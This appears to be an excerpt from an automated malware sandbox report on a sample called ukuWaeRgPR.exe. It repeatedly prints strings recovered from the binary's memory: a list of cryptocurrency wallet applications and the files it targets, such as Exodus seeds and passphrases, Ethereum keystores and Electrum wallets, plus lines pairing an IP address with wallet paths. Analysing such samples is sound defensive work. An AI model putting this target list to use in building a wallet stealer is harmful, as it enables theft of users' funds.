Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77rs\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*n
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 77.91.77.81\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 